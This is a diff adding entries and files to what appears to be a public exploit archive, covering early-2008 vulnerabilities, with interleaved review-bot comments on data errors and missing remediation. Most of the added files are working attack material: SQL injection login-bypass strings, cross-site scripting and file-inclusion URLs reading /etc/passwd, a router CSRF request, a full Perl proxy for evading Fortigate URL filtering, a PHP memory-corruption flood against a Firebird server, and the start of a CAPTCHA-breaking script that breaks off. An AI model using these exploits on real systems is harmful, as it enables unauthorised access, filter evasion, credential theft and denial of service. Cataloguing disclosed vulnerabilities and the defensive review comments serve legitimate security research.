diff --git a/files.csv b/files.csv
index 5ba25f783..f8b91ca39 100755
--- a/files.csv
+++ b/files.csv
@@ -27841,3 +27841,48 @@ id,file,description,date,author,platform,type,port
31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow Vulnerability",2008-01-11,anonymous,windows,remote,0
31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0
31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0
+31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0
+31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0
+31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0
+31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0
+31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0
+31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 URI Security Bypass Vulnerability",2008-01-16,nnposter,hardware,remote,0
+31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0
+31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0
+31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0
+31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0
+31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0
+31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0
+31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0
+31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0
+31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0
+31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0
+31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0
+31045,platforms/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 'ffile' Parameter Remote File Include Vulnerability",2008-01-21,anonymous,php,webapps,0
+31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 ActiveX Control 'ChatRoom()' Buffer Overflow Vulnerability",2008-01-09,Knell,windows,remote,0
+31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 'txt' Parameter Cross-Site Scripting Vulnerability",2008-01-22,"Jan Fry",multiple,remote,0
+31048,platforms/php/webapps/31048.txt,"PacerCMS 0.6 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-01-22,RawSecurity.org,php,webapps,0
+31049,platforms/php/webapps/31049.txt,"DeluxeBB 1.1 'attachments_header.php' Cross-Site Scripting Vulnerability",2008-01-22,NBBN,php,webapps,0
+31050,platforms/multiple/remote/31050.php,"Firebird <= 2.0.3 Relational Database 'protocol.cpp' XDR Protocol Remote Memory Corruption Vulnerability",2008-01-28,"Damian Frizza",multiple,remote,0
+31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 chrome:// URI JavaScript File Request Information Disclosure Vulnerability",2008-01-19,"Gerry Eisenhaur",linux,remote,0
+31052,platforms/linux/remote/31052.java,"Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability",2008-01-22,"Stefano Di Paola",linux,remote,0
+31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
+31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
+31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
+31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
+31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
+31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
+31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 'index.php' Cross-Site Scripting Vulnerability",2008-01-25,"Omer Singer",php,webapps,0
+31061,platforms/php/webapps/31061.txt,"trixbox 2.4.2 user/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31062,platforms/php/webapps/31062.txt,"trixbox 2.4.2 maint/index.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0
+31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0
+31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0
+31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
+31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0
+31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0
+31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0
+31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0
+31071,platforms/cgi/webapps/31071.txt,"VB Marketing 'tseekdir.cgi' Local File Include Vulnerability",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
+31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 FileUpload Class Unauthorized File Upload Vulnerability",2007-01-05,titon,windows,remote,0
+31073,platforms/java/webapps/31073.html,"SunGard Banner Student 7.3 'add1' Parameter Cross-Site Scripting Vulnerability",2008-01-29,"Brendan M. Hickey",java,webapps,0
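Review bot: Several of the added rows carry values that look like data-entry slips and will skew anything keyed on these columns. Rows 31030 and 31072 are dated 2007 while their neighbours, including 31029 by the same author as 31030, are dated January 2008. The author field is stored as `"AmnPardaz "` with a trailing space on 31041, 31055, 31066 and 31068, and the descriptions of 31058 and 31059 spell `Vulnerabilies`. Row 31065 files an F5 BIG-IP Application Security Manager issue under `php,webapps`, whereas the existing BIG-IP row 31024 is `hardware,remote`. If these are not intentional, normalising them before merge keeps search, de-duplication and per-author or per-platform triage reliable; IDs 31032, 31033 and 31054 are also absent from the range, which may be deliberate.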
diff --git a/platforms/asp/webapps/31042.txt b/platforms/asp/webapps/31042.txt
new file mode 100755
index 000000000..280f73787
--- /dev/null
+++ b/platforms/asp/webapps/31042.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27368/info
+
+MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MegaBBS 1.5.14b is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/profile-upload/upload.asp?target=code
\ No newline at end of file
diff --git a/platforms/asp/webapps/31055.txt b/platforms/asp/webapps/31055.txt
new file mode 100755
index 000000000..96580c393
--- /dev/null
+++ b/platforms/asp/webapps/31055.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27419/info
+
+Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.
+
+This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable.
+
+http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\
\ No newline at end of file
diff --git a/platforms/asp/webapps/31058.txt b/platforms/asp/webapps/31058.txt
new file mode 100755
index 000000000..a08c3905b
--- /dev/null
+++ b/platforms/asp/webapps/31058.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27450/info
+
+Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Passing the following will bypass the authentication process:
+
+' or '
\ No newline at end of file
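Review bot: The advisory ends on the bypass string and gives the reader nothing about the fix or how to recognise abuse; 31059.txt and 31070.txt have the same gap with the same login example. I would add a closing line such as `Remediation: build the login query with parameterized statements rather than concatenating the submitted username and password; review authentication logs for quote characters in login fields.` None of the three files names the affected version or the vulnerable parameter, so that should be stated as unknown rather than left implicit.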
diff --git a/platforms/asp/webapps/31059.txt b/platforms/asp/webapps/31059.txt
new file mode 100755
index 000000000..1089dfb0a
--- /dev/null
+++ b/platforms/asp/webapps/31059.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27452/info
+
+E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following exploit information is available:
+
+Passing:
+
+' or '
+
+will bypass the authentication process.
\ No newline at end of file
diff --git a/platforms/asp/webapps/31070.txt b/platforms/asp/webapps/31070.txt
new file mode 100755
index 000000000..2e3608a51
--- /dev/null
+++ b/platforms/asp/webapps/31070.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/27474/info
+
+ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following exploit information is available:
+
+Passing:
+
+' or '
+
+will bypass the authentication process.
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31043.txt b/platforms/cgi/webapps/31043.txt
new file mode 100755
index 000000000..af4d0d92b
--- /dev/null
+++ b/platforms/cgi/webapps/31043.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27374/info
+
+Alice Gate2 Plus Wi-Fi routers are prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit this issue to alter administrative configuration on affected devices. Specifically, altering the wireless encryption settings on devices has been demonstrated. Other attacks may also be possible.
+
+http://www.example.com/cp06_wifi_m_nocifr.cgi?wlChannel=Auto&wlRadioEnable=on
\ No newline at end of file
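Review bot: The example on the last content line shows a configuration change carried entirely in a GET query string, but the advisory names neither the affected firmware nor any mitigation. I would add a sentence such as `Mitigation: state-changing requests should require a per-session anti-CSRF token and a non-GET method; until the firmware does so, log out of the router's admin interface before browsing other sites.` If the affected firmware version is unknown, say so explicitly.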
diff --git a/platforms/cgi/webapps/31071.txt b/platforms/cgi/webapps/31071.txt
new file mode 100755
index 000000000..466dfbb23
--- /dev/null
+++ b/platforms/cgi/webapps/31071.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27475/info
+
+VB Marketing is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local script code in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
+
+http://www.example.com/cgi-bin/tseekdir.cgi?location=/etc/passwd%00
\ No newline at end of file
diff --git a/platforms/hardware/remote/31026.pl b/platforms/hardware/remote/31026.pl
new file mode 100755
index 000000000..02c0eed00
--- /dev/null
+++ b/platforms/hardware/remote/31026.pl
@@ -0,0 +1,222 @@
+source: http://www.securityfocus.com/bid/27276/info
+
+Fortinet Fortigate is prone to a vulnerability that can allow attackers to bypass the device's URL filtering.
+
+An attacker can exploit this issue to view unauthorized websites, bypassing certain security restrictions. This may lead to other attacks.
+
+This issue affects Fortigate-1000 3.00; other versions may also be affected.
+
+NOTE: This issue may be related to the vulnerability described in BID 16599 (Fortinet Fortigate URL Filtering Bypass Vulnerability).
+
+#!/usr/bin/perl
+
+########################################
+# fortiGuard.pl v0.1 - http://www.macula-group.com/
+#
+# # URL Filtering Bypass proof of concept
+# Author: Daniel Regalado aka Danux... Hacker WannaBe!!! (only some
+minnor modifications from sinhack code)
+# Based on PoC from sinhack research labs -> sakeru.pl
+#
+#FortiGuard's URL blocking functionality can be bypassed by
+specially-crafted HTTP requests that are terminated by the CRLF
+character
+#instead of the LF characters and changing version of HTTP to 1.0
+without sending Host: Header and Fragmenting the GET and POST Requests
+#
+#Tested On: fortiGate-1000 3.00, build 040075,070111
+#
+#This code has been released Only for educational purposes. The author
+cannot be held responsible for any bad use.
+# Usage:
+# 1) perl fortiGuard.pl
+# 2) Configure your browser's proxy at localhost:5050
+# 3) Have fun.
+
+# --- Start Of Script---
+
+use strict;
+use URI;
+use IO::Socket;
+
+my $showOpenedSockets=1; #Activate the console logging
+my $debugging=0;
+
+
+my $server = IO::Socket::INET->new ( #Proxy Configuration
+ LocalPort => 5050, #Change the listening port here
+ Type => SOCK_STREAM,
+ Reuse => 1,
+ Listen => 10);
+
+binmode $server;
+print "Waiting for connections on port 5050 TCP...\n";
+
+while (my $browser = $server->accept()) { #When a connection occure...
+ binmode $browser;
+ my $method="";
+ my $content_length = 0;
+ my $content = 0;
+ my $accu_content_length = 0;
+ my $host;
+ my $hostAddr;
+ my $httpVer;
+ my $line;
+
+ while (my $browser_line = <$browser>) { #Get the Browser commands
+ unless ($method) {
+ ($method, $hostAddr, $httpVer) = $browser_line =~ /^(\w+)
++(\S+) +(\S+)/;
+
+ my $uri = URI->new($hostAddr);
+
+ $host = IO::Socket::INET->new ( #Opening the connexion to the
+remote host
+ PeerAddr=> $uri->host,
+ PeerPort=> $uri->port ) or die "couldn't open $hostAddr";
+
+
+ if ($showOpenedSockets) { #Connection logs
+ #print "Source:".$browser->peerhost."\n";
+ my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) =
+localtime(time);
+ $year += 1900;
+ $mon += 1;
+ printf ("\n%04d-%02d-%02d %02d:%02d:%02d
+",$year,$mon,$mday,$hour,$min,$sec);
+ print $browser->peerhost." -> ".$uri->host.":".$uri->port."
+$method ".$uri->path_query."\n";;
+ }
+
+ binmode $host;
+ my $char;
+ if ($method == "GET") { #Fragmention the "GET" query
+ foreach $char ('G','E','T',' ') { #I know, there is better
+way to do it,
+ print $host $char; #but I'm tired and lazy...
+ }
+ } elsif ($method == "POST") { #Fragmentation of "POST" query
+ foreach $char ('P','O','S','T',' ') {
+ print $host $char;
+ }
+ } else {
+ print $host "$method "; #For all the other methods, send
+them without modif
+ print "*";
+ }
+ $httpVer="HTTP/1.0"; #Forzando a version 1.0
+ print $host $uri->path_query . " $httpVer\r\n"; #Send the rest
+of the query (url and http version)
+ #next;
+ }
+
+ $content_length = $1 if $browser_line=~/Content-length: +(\d+)/i;
+ $accu_content_length+=length $browser_line;
+
+ foreach $line (split('\n', $browser_line)) { #Fragment the Host query
+ if ($line =~ /^Host:/ ) {
+ #my $char="";
+ #my $word="";
+ #my $bogus="";
+ #($bogus,$word) = split(' ', $line);
+ #foreach $char ('H','o','s','t',':',' ') {
+ #print $host $char;
+ #}
+ #print $host $word."\r\n";
+
+ } else {
+ print $host "$line\r\n"; #For all the other lines, send
+them without modif
+ }
+
+ if ( $debugging == 1 && $method == "POST" ) {
+ print "$line\n";
+ }
+ }
+ #Danux Clave para terminar el Request y enviarlo al servidor
+web, de otra forma se queda esperando este ultimo la peticion
+ print $host "\r\n";
+
+
+ last if $browser_line =~ /^\s*$/ and $method ne 'POST';
+ if ($browser_line =~ /^\s*$/ and $method eq "POST") {
+ $content = 1;
+ last unless $content_length;
+ next;
+ }
+ #print length $browser_line . " - ";
+ if ($content) {
+ $accu_content_length+=length $browser_line;
+ last if $accu_content_length >= $content_length;
+ }
+ }
+
+ $content_length = 0;
+ $content = 0;
+ $accu_content_length = 0;
+
+ my $crcount=0;
+ my $totalcounter=0;
+ my $packetcount=0;
+
+ while ( my $host_line = <$host> ) { #Reception of the result from the server
+
+ $totalcounter+=length $host_line;
+ print $browser $host_line; #Send them back to the browser
+ #print $host_line if ( ! $content ); #Send them back to the browser
+ if ($host_line=~/Content-length: +(\d+)/i) {
+ $content_length = $1;
+ #print " * Expecting $content_length\n"; #if ($debugging);
+ }
+ if ($host_line =~ m/^\s*$/ and not $content) {
+ $content = 1;
+ #print " * Beginning of the data section\n";
+ }
+ if ($content) {
+ #$accu_content_length+=length $host_line;
+ if ($content_length) {
+ #print " * binary data section\n";
+ my $buffer;
+ my $buffersize = 512;
+ if ($content_length < $buffersize) { $buffersize = $content_length; }
+ while ( my $nbread = read($host, $buffer, $buffersize)) {
+ print "#";
+ $packetcount++;
+ $accu_content_length+=$nbread;
+ #last if $accu_content_length >= $content_length;
+ print $browser $buffer; #Send them back to the browser
+ #print $buffer;
+ #print "\n(#$packetcount) ";
+ #print "total: $totalcounter content_length:
+$content_length acc: $accu_content_length\t";
+ my $tmp1 = $content_length - $accu_content_length;
+ #print "length-accu= $tmp1\n";
+
+ if ($tmp1 < $buffersize) {
+ $buffersize = $tmp1;
+ #print "new buffersize = $buffersize\n";
+ }
+ }
+ #print "Out of the content while\n";
+ }
+ }
+
+ #print "(#$packetcount) ";
+ #print "total: $totalcounter content_length: $content_length
+acc: $accu_content_length\t";
+ #my $tmp1 = $content_length - $accu_content_length;
+ #print "length-accu= $tmp1\n";
+ last if ($accu_content_length >= $content_length and $content ==
+1 and $content_length);
+ }
+ #print "\nOut for a while\n";
+
+
+ if ($browser) { $browser -> close; } #Closing connection to the browser
+ if ($host) { $host -> close; } #Closion connection to the server
+
+}
+
+# --- EOF ---
+
+
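Review bot: The listener built by `IO::Socket::INET->new` with `LocalPort => 5050` sets no `LocalAddr`, so it accepts connections on every interface and anyone who can reach the test machine gets an unauthenticated forwarding proxy, even though the usage text only expects a browser on localhost:5050. Adding `LocalAddr => '127.0.0.1',` to the constructor keeps a lab run from exposing that. The header comment already lists the observable traits of the bypass (requests forced to HTTP/1.0, the Host header dropped, the request line split across several writes); the advisory prose above the script should repeat them, since they are what a filter or proxy-log rule has to key on.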
diff --git a/platforms/hardware/remote/31031.txt b/platforms/hardware/remote/31031.txt
new file mode 100755
index 000000000..de428c49f
--- /dev/null
+++ b/platforms/hardware/remote/31031.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/27309/info
+
+8e6 R3000 Internet Filter is prone to a vulnerability that allows attackers to bypass URI filters.
+
+Attackers can exploit this issue by sending specially crafted HTTP request packets for an arbitrary website. Successful exploits allow attackers to view sites that the device is meant to block access to. This could aid in further attacks.
+
+R3000 Internet Filter 2.0.05.33 is vulnerable; other versions may also be affected.
+
+packet 1: GE
+packet 2: T / HTTP/1.0\r\n
+
+
+
+
+packet 1: GET / HTTP/1.0
+X-SomeHeader: ...
+....
+
+packet 2: X-SomeOtherHeader: ....
+Host: www.example.com
+...
\ No newline at end of file
diff --git a/platforms/java/webapps/31073.html b/platforms/java/webapps/31073.html
new file mode 100755
index 000000000..fc8912f91
--- /dev/null
+++ b/platforms/java/webapps/31073.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27490/info
+
+Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Banner Student 7.3 is vulnerable; other versions may also be affected.
+
+
Enter a new emergency contact. When finished, Submit Changes.
\ No newline at end of file
diff --git a/platforms/linux/remote/31051.txt b/platforms/linux/remote/31051.txt
new file mode 100755
index 000000000..bb1c661ec
--- /dev/null
+++ b/platforms/linux/remote/31051.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27406/info
+
+Mozilla Firefox is prone to an information-disclosure vulnerability because it fails to restrict access to local JavaScript, images and stylesheets files.
+
+Attackers can exploit this issue to gain access to potentially sensitive information that could aid in further attacks.
+
+Firefox 2.0.0.11 is vulnerable; other versions may also be affected.
+
+NOTE: For an exploit to succeed, a user must have an addon installed that does not store its contents in a '.jar' file. The attacker would have to target a specific addon that uses "flat" packaging.
+
+
\ No newline at end of file
diff --git a/platforms/linux/remote/31052.java b/platforms/linux/remote/31052.java
new file mode 100755
index 000000000..df7a26443
--- /dev/null
+++ b/platforms/linux/remote/31052.java
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/27409/info
+
+Apache 'mod_negotiation' is prone to an HTML-injection and an HTTP response-splitting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted; other attacks are also possible.
+
+// Tested on IE 7 and FF 2.0.11, Flash plugin 9.0 r115
+// Compile with flex compiler
+package
+{
+ import flash.display.Sprite;
+ import flash.net.*
+ public class TestXss extends flash.display.Sprite {
+ public function TestXss(){
+ var r:URLRequest = new URLRequest('http://victim/#alert(123)');
+
+ r.method = 'POST';
+ r.data = unescape('test');
+ r.requestHeaders.push(new URLRequestHeader('Accept', 'image/jpeg; q=0'));
+
+ navigateToURL(r, '_self');
+
+ }
+ }
+}
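Review bot: The file is stored as `31052.java` and indexed as `linux,remote`, but the code is ActionScript (`package`, `flash.display.Sprite`, and the comment `// Compile with flex compiler`), so extension-based tooling and anyone triaging by file type will misclassify it. Renaming it with an `.as` extension, or at least adding a first-line comment stating the language, would fix that. The advisory text also names no affected version, while the files.csv row says `Apache <= 2.2.6`; repeating that in the file keeps the two consistent.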
diff --git a/platforms/multiple/remote/31047.txt b/platforms/multiple/remote/31047.txt
new file mode 100755
index 000000000..f7fe328b6
--- /dev/null
+++ b/platforms/multiple/remote/31047.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27394/info
+
+Novemberborn sIFR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to sIFR 2.0.3 and 3r278 are vulnerable.
+
+https://www.example.com/.swf?txt=click me! http://www.example.com/fonts/FuturaLt.swf?txt=%3Ca%20href=%22javascript:alert(document.cookie)%22%3Eclick%20me!%3C/a%3E&textalign=left&offsetTop=-2&textcolor=
\ No newline at end of file
diff --git a/platforms/multiple/remote/31050.php b/platforms/multiple/remote/31050.php
new file mode 100755
index 000000000..49be04e0f
--- /dev/null
+++ b/platforms/multiple/remote/31050.php
@@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/27403/info
+
+Firebird is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to overflow a buffer and to corrupt process memory.
+
+Attackers may be able to execute arbitrary machine code in the context of an affected application. Failed exploit attempts will likely result in a denial-of-service condition.
+
+(data->p_data_request));
+* MAP(xdr_short, reinterpret_cast(data->p_data_incarnation));
+* MAP(xdr_short, reinterpret_cast(data->p_data_transaction));
+* MAP(xdr_short, reinterpret_cast(data->p_data_message_number));
+* return xdr_request(xdrs, data->p_data_request,
+* data->p_data_message_number,
+* data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
+*
+* Firebird Connect Packet
+* * 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
+* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8 .ј....@..%АЁ|cАЁ
+* 0x0020 7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10 |c.к.?........P.
+* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00 @...............
+* 0x0040 00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F ..........
+* 0x00A0 00 00 ..
+*
+*/
+ $___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
+ for ($temp = 0; $temp < 5; $temp ++){
+ $___zuntzu = fsockopen('192.168.124.99',3050);
+ fwrite($___zuntzu , $___suntzu);
+ fclose($___zuntzu );
+ sleep(1);
+ }
+?>
diff --git a/platforms/osx/dos/31057.html b/platforms/osx/dos/31057.html
new file mode 100755
index 000000000..7172cd4c3
--- /dev/null
+++ b/platforms/osx/dos/31057.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27442/info
+
+Apple iPhone is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.
+
+iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/php/remote/31053.php b/platforms/php/remote/31053.php
new file mode 100755
index 000000000..aa5c9e4c6
--- /dev/null
+++ b/platforms/php/remote/31053.php
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27413/info
+
+PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
+
+Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
+
+The issue affects PHP 5.2.5 and 5.2.4.
+
+var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
\ No newline at end of file
diff --git a/platforms/php/webapps/31027.txt b/platforms/php/webapps/31027.txt
new file mode 100755
index 000000000..0bbd8d283
--- /dev/null
+++ b/platforms/php/webapps/31027.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27282/info
+
+pMachine Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The issues affect pMachine Pro 2.4.1; other versions may also be vulnerable.
+
+NOTE: pMachine Pro has been replaced by ExpressionEngine. The vendor recommends upgrading.
+
+http://www.example.com/pm/language/spanish/preferences.php?L_PREF_NAME[855]=
+
diff --git a/platforms/php/webapps/31028.txt b/platforms/php/webapps/31028.txt
new file mode 100755
index 000000000..335f011e6
--- /dev/null
+++ b/platforms/php/webapps/31028.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27286/info
+
+Article Dashboard is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/admin/login.php?user=admin'-- | /*
\ No newline at end of file
diff --git a/platforms/php/webapps/31029.pl b/platforms/php/webapps/31029.pl
new file mode 100755
index 000000000..954559936
--- /dev/null
+++ b/platforms/php/webapps/31029.pl
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/27287/info
+
+Peter's Math Anti-Spam for WordPress is prone to a security-bypass vulnerability.
+
+This issue occurs when presenting a visitor with challenge data to determine if they are a legitimate user or an automaton. The challenge data is poorly obfuscated and can be interpreted by script code.
+
+Attackers can leverage this issue to bypass the security measures provided by the plugin via an automated script. This could aid in spam distribution and other attacks.
+
+Peter's Math Anti-Spam for WordPress 0.1.6 is vulnerable; other versions may also be affected.
+
+$ cat math_spam.pl
+#!/usr/bin/perl -w
+
+require bytes;
+
+ my $buffer;
+ my $number;
+ my $op1;
+ my $op2;
+
+ my %numberPrints = ("0045", 0,
+ "00c5", 1,
+ "0485", 2,
+ "4309", 3,
